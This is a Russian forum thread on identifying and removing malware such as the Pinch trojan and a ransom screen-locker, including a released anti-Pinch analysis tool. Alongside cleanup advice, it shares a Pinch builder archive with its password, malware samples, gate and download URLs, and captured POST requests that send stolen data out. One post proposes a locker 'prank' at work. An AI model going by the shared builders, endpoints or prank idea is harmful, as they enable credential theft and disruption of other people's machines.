В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

Gambit - это который copy.exe копирует на все диски?

| Сообщение посчитали полезным:

Ice-T, файло не качал, но по описанию похоже что именно это(что ты написал в конце) он и делает..., таким образом он запускает файл прямо из памяти не скидывая его на диск =))

| Сообщение посчитали полезным:

Ara
Не.. это более извращенческое =(
Чем оно упаковано?
Блин.. оказался бОян =
amvo.exe

-----
программистом не рождаются - им умирают

| Сообщение посчитали полезным:

решил наконец зарелизить:

...:::[Antipinch 0.1]:::...

Тулза предназначена для анализа подозрительных exe файлов и позволяет определить
наличие известного трояна Pinch в них.

[x] запускает подозрительный файл и внедряет в него dll.
[x] перехватывает CreateProcessA/CreateProcessW и вдедряет dll в дочернии процессы.
[x] перехватывает connect/send и не позволяет трояну отправить данные на гейт.
[x] в результате работы создаёт подробный лог файл.
[x] ВНИМАНИЕ, пока работает только с гейтовой версией пинча.
[x] рекомендуется запускать при отключенном интернете или на виртуальной ОС.


скачать видео пособие http://hellspawn.nm.ru/works/info_antipinch.zip
скачать Antipinch 0.1 http://hellspawn.nm.ru/works/antipinch_0.1.zip

p.s. Кинте плз линк на "мыльный" билд.

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Pinch3 Builder 1.2
pass: 123

180a_07.02.2008_CRACKLAB.rU.tgz - pinch3 Builder.rar

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

Hellspawn

hellspawn.nm.ru/works/antipinch_0.1.zip
Предупреждение о мошенничестве

Страница, которую вы пытаетесь открыть, занесена в черный список как мошенническая. Вероятно, будет предпринята попытка получить личную или финансовую информацию обманным путем. Посещение данной страницы не рекомендуется. Дополнительные сведения о защите от мошенничества.

Ты кому-то видать насолил...

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

ыыы бред) залил ещё сюды:

nezumi.org.ru/hellspawn/antipinch_0.1.zip
nezumi.org.ru/hellspawn/info_antipinch.zip

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Вот есчо одна шутка, даже не знаю как назвать... Типа вирус, блочит рабочий стол и воводит сообщение о том, что б его разблочить - нужно заплатить 200 рублей...

Запустил ради прикола у себя (тругим лучше ВМварэ юзать), реально все заблочилось... Прописывается в автозагрузке в реестре и гдето в профиле текущего пользователся. Сама программа которая все блочит гдето в профиле и валяется, от тудова и грузится... А какае то дллка, загружаемая автоматом из реестра это все контролирует...

Если расковырять программку и вытянуть непосредственно ту, что все блочит - получится хорошая шутка на работе


Файл успешно закачан: dump.ru/files/o/o062191886/
пасс на архив "1!

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

я помню подобную дрянь подцепил тоже. только там всё в реестр прописывалось и просили вроде 150 рэ... рабочий стол был сдвинут, на часах в трее вместо даты было что-то матом написано, в заголовке ie - мой жопорез и т.д. не работали все иконки с раб. стола, но работала панель задач. собственно с неё я и вызывал regedit (командная строка была тоже "заблокировна администратором"). просьбе о переводе показывалась в виде рисунка при загрузке. рисунок лежал в системной папке. пошукав по дате создания нашёл сам рег-файл в котором с смотрел, что мне изменили. потом отправил автору мыльце с посылом в очень далёкие края, а сам патч (типа, универсальный кряк для почти 1000 програм. мол, в реестр серийники прописывает) в лабу касперу. через день я даже не мог открыть рег-файл - каспер ругался...

-----
Do Not Get Mad Get Money! ;)

| Сообщение посчитали полезным:

KingSise пишет:
блочит рабочий стол и воводит сообщение о том, что б его разблочить - нужно заплатить 200 рублей...
Дык...эт местный прикол, мелькал по осени, там две записи в реестре, и файло переименованное под проводник кажетЦа.
С лайвсиди килятетЦа на раз два три...

-----
Чтобы юзер в нэте не делал,его всё равно жалко..

| Сообщение посчитали полезным:

Куда катится мир, какие то вандалы-попрошайки, WM воры и прочие черти. Помню препод рассказывал про банковского девелопера, который остаток от округления при подсчёте процентов (раньше просто забывался, тк там меньше цента суммы) переводил себе на счёт пока налоговая не приехала - не учел, что оборот большой =)

| Сообщение посчитали полезным:

Bronco пишет:
С лайвсиди килятетЦа на раз два три...

Я сделал бэкап реестра с лайвсиди, порога всеравно грузилась (в профиле видать прописалась есчо)... Но теперь можно было зайти в другую учетную запись и удалить файло с профиля... Особо эту хрень не копал, но честно скажу, ожидал большего, руткит какой-нибудь... А так лажа, но поиграться, - прикольно.

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

Это какойто модифицированный вирус, заблочил все нах и "БЛ%ДЬ" в часах написал... Поудалял я все файло им созданное, а он всеравно гдето запускается... В реестре вроде ничего новое в автозапуске не появилось... Почистил учетную запись пользователя, где эту хрень запускал, все восстановилось кроме прав, исполняемые файлы попрежнему не запускаются, надо вобщем бэкап реестра наместо поставить, но как это в ВМ сделать - хз, проще клонировать

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

KingSise
в \system32 ищи по дате

-----
Чтобы юзер в нэте не делал,его всё равно жалко..

| Сообщение посчитали полезным:

Очередной улов в локалке

1345_08.02.2008_CRACKLAB.rU.tgz - loadadv540.exe

| Сообщение посчитали полезным:

KingSise
www.threatexpert.com/report.aspx?uid=7c395cb3-1c34-4034-9e01-f5bd644186d8
analysis.seclab.tuwien.ac.at/result.php?taskid=20099769b842b5747183d00cb38043f5

проверяй кучу веток реестра, проверяй файлы, грохай то что насоздавалось.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Klever
стучит суда:
_ttp://acdedblshd.com/progs/tdarf/vwjjbss.php?adv=adv540
от сюда льёт файло:
_ttp://acdedblshd.com/progs/tdarf/vsskkopgtx.php

Backdoor.Win32.Agobot.app ndovla.exe (сливает его)
Heur.KillFiles (модификация) loadadv540.exe

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

[HEX], пасибки, то что нужно... Я впринцепе так и предпологал, ток не знаю как реестр в ВМварэ бэкапить...

Но инфа в первой ссылке не полная, кроме создания папок и мидифицирования раестра вись комипует свои копии ( 3 насчитал) в разные папочки... Кроме того гадит в профиле текущего пользователя, т.е. после полного восстановления реестра, нужно будет есчо и профиль почистить...

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

гг... бредовая идея... а может заплатить ему, получить от него способ/антивирь и потом давать народу, кто подцепит эту гадость?
(блин... вот я чушь несу...)

-----
Do Not Get Mad Get Money! ;)

| Сообщение посчитали полезным:

Hellspawn пишет:
решил наконец зарелизить:

...:::[Antipinch 0.1]:::...

Респект, давно думал о реализации такой вещи. Будет время, на днях потестю

Hellspawn пишет:
Кинте плз линк на "мыльный" билд.

Какие проблемы заходи на dump.ru или webfile.ru в строке поиска напиши pinch.exe

________

ADD: Посмотрел, а самое главное почему не показывает куда отчеты должны уходить?

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

_ttp://egoakk.at.ua/load/ - тут софт для вконтакта склеенный с пинчем)

POST /my/rtest/e.php HTTP/1.0
Host: _ww.poncher.110mb.com

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

«Вы проебали свой номер Вам сюда!»... exprogs.ru/icq
Гейт...)) exprogs.ru/gate

| Сообщение посчитали полезным:

«Вы проебали свой номер Вам сюда!»... exprogs.ru/icq
Гейт...)) exprogs.ru/gate
Боян =))))
Владелец данного сайтеса некто Гангстер, использует связку ICE Pack (http://exprogs.ru/ice/admin)...А пару недель назад он сам лишился своего шестизнака 823-343
ПС: нехер пинчей рассылать!

-----
бессмысленные манипуляции не становятся более разумными если их повторять

| Сообщение посчитали полезным:

Очередная зверушко:

9bb6_20.02.2008_CRACKLAB.rU.tgz - Patch_1.6.8.exe

| Сообщение посчитали полезным:

[Info] -----------------------------------------------------
Scan: PINCH SIGNATURE DETECTED
[Packet] ---------------------------------------------------
POST /gate/gate.php HTTP/1.0
Host: userGH.freehostia.com
...
[End] ------------------------------------------------------

з.ы. я быстрее ;)

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Klever
Очередной Пинч с шлюзом hxxp://usergh.freehostia.com/gate/gate.php

P.S. :P ну и ладно.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

А понял, нашёл этого "Антипыча" да сходится ;)
Смотрю сейчас, там в гейте уже шеллы пробуют закачать ))
О! Там гейт с админкой,
gate.php?stat=1
genom

| Сообщение посчитали полезным:

Ебнул гейт чтобы отчеты не собирал. Правда он его снова зальет наверника...

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

тут уже говорили про Bonjour. кто-нить проверял его детально? у меня кореш называет это вирусом. говорит что он ничего не даёт с собой сделать и вроде как пачкает архивы. не даёт поставить антивирь, а нода вообще снёс установленного. вроде и на флешку сам скопировался. никто с подобным "француским приветом" в последнее время не сталкивался?

-----
Do Not Get Mad Get Money! ;)

| Сообщение посчитали полезным:

Talula, я несмотрел че он творит, но у друга была эта хрень, с архивами ниче неделал, аверы без проблем давал поставить (каспер, веб, нода), авер несносил (веб), на флехи ниче некопировал, так же вместе с этой хренью появился файл service.exe в папке system32 и еще парочка com файлов левых, тоже в папке винды (названия файлов непомню). Друг сносил этот Bonjour из другой системы, так же эта хрень пробывала вылазить в инет, но фаером норм блокирывалась, жила эта хрень на компеге друга около месяца, ниче заметного не произошло с системой до сих пор.
З.Ы. Еще в автозапуске прописывался этот "французский привет"

| Сообщение посчитали полезным: